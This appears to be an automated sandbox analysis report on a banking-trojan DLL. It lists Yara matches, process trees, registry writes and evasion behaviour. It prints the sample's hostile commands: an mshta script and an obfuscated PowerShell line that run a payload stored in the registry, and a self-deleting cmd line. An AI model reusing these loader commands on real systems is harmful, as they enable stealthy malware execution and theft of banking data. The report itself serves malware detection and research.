                      Source: Yara matchFile source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01065FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_01065FBB

                      System Summary

                      barindex
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: tIJVb0BvkI.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01064BF13_2_01064BF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010616453_2_01061645
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0106829C3_2_0106829C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0106190C GetProcAddress,NtCreateSection,memset,3_2_0106190C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01066D0A NtMapViewOfSection,3_2_01066D0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01064321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_01064321
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010684C1 NtQueryVirtualMemory,3_2_010684C1
                      Source: tIJVb0BvkI.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs tIJVb0BvkI.dll
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: tIJVb0BvkI.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: tIJVb0BvkI.dllReversingLabs: Detection: 47%
                      Source: tIJVb0BvkI.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kmli='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kmli).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP"Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5 Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220504Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3nzoxvm.isc.ps1Jump to behavior
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@24/15@0/2
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010668BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,3_2_010668BD
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{E89B07B0-274E-5A75-F19C-4B2EB590AF42}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{E8676F4A-27AA-5A21-F19C-4B2EB590AF42}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: tIJVb0BvkI.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.578381495.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.582897274.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: tIJVb0BvkI.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.578381495.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.582897274.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0106828B push ecx; ret 3_2_0106829B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01067EA0 push ecx; ret 3_2_01067EA9
                      Source: tIJVb0BvkI.dllStatic PE information: section name: .erloc
                      Source: tIJVb0BvkI.dllStatic PE information: real checksum: 0x79835 should be: 0x7529a
                      Source: 5xaibb03.dll.17.drStatic PE information: real checksum: 0x0 should be: 0xd18c
                      Source: 2tb3qiq3.dll.14.drStatic PE information: real checksum: 0x0 should be: 0x12ed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: Yara matchFile source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dllJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
